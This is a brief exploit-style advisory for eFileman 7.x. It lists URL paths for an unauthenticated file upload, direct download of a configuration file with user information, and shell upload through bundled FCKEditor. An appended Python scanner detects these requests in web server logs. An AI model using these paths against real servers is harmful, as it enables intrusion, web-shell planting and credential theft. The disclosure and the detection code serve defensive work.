Software : eFileman

Version : 7.x (tested on 7.1.0.87-88)

Found by : Xcross87


A. Remote File Upload Vulnerability :


Xploit :


http://victim.com/[path]/upload.html

http://victim.com/[path]/cgi-bin/efileman/upload.cgi


The uploaded files are stored in :

http://victim.com/[path]/uploads/upload_file.xxx


B. Direct Access or Download Configuration File

Xploit :

http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information


C. FCKEditor Inclusion.

For full eFileman installation packages that include FCKEditor, an attacker can upload a shell through the FCKEditor upload vulnerability.


=== Xcross87 | HCETeam Xploiter ===
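
A log check for the issues in sections A and B, added here as an example and not part of the original advisory. It assumes Apache combined log format; the sample lines, the /files/ prefix, the extension list and the function name scan are constructed for illustration.

```python
import re

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2008:10:00:01 +0000] "GET /files/cgi-bin/efileman/efileman_config.pm HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2008:10:00:09 +0000] "POST /files/cgi-bin/efileman/upload.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2008:10:00:15 +0000] "GET /files/uploads/test.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2008:10:02:00 +0000] "GET /files/cgi-bin/efileman/efileman_config.pm HTTP/1.1" 403 199 "-" "curl/7.0"
198.51.100.9 - - [10/Jan/2008:10:03:00 +0000] "GET /files/uploads/report.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
"""

# client IP, method, URL and status from one combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Assumed list of extensions a server might execute; match it to the handlers configured.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|pl|cgi|asp|aspx|jsp|sh)$', re.I)

def scan(log_text):
    """Return (ip, finding, url) tuples for requests matching the advisory's paths."""
    findings = []
    uploaders = set()  # clients that completed a POST to upload.cgi
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, url, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = url.split('?', 1)[0].lower()
        if not 200 <= status < 300:
            continue  # blocked or failed requests are not findings
        if path.endswith('/efileman_config.pm'):
            # Section B: the configuration file was served to a client.
            findings.append((ip, 'config_served', url))
        elif path.endswith('/efileman/upload.cgi') and method == 'POST':
            # Section A: a file was posted to the upload handler.
            uploaders.add(ip)
            findings.append((ip, 'upload_post', url))
        elif '/uploads/' in path and SCRIPT_EXT.search(path):
            # A script-type file fetched from the upload directory.
            kind = 'script_after_upload' if ip in uploaders else 'script_in_uploads'
            findings.append((ip, kind, url))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A config_served finding means the web server returned the .pm file, so the credentials in it should be treated as exposed and direct access to that file denied.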
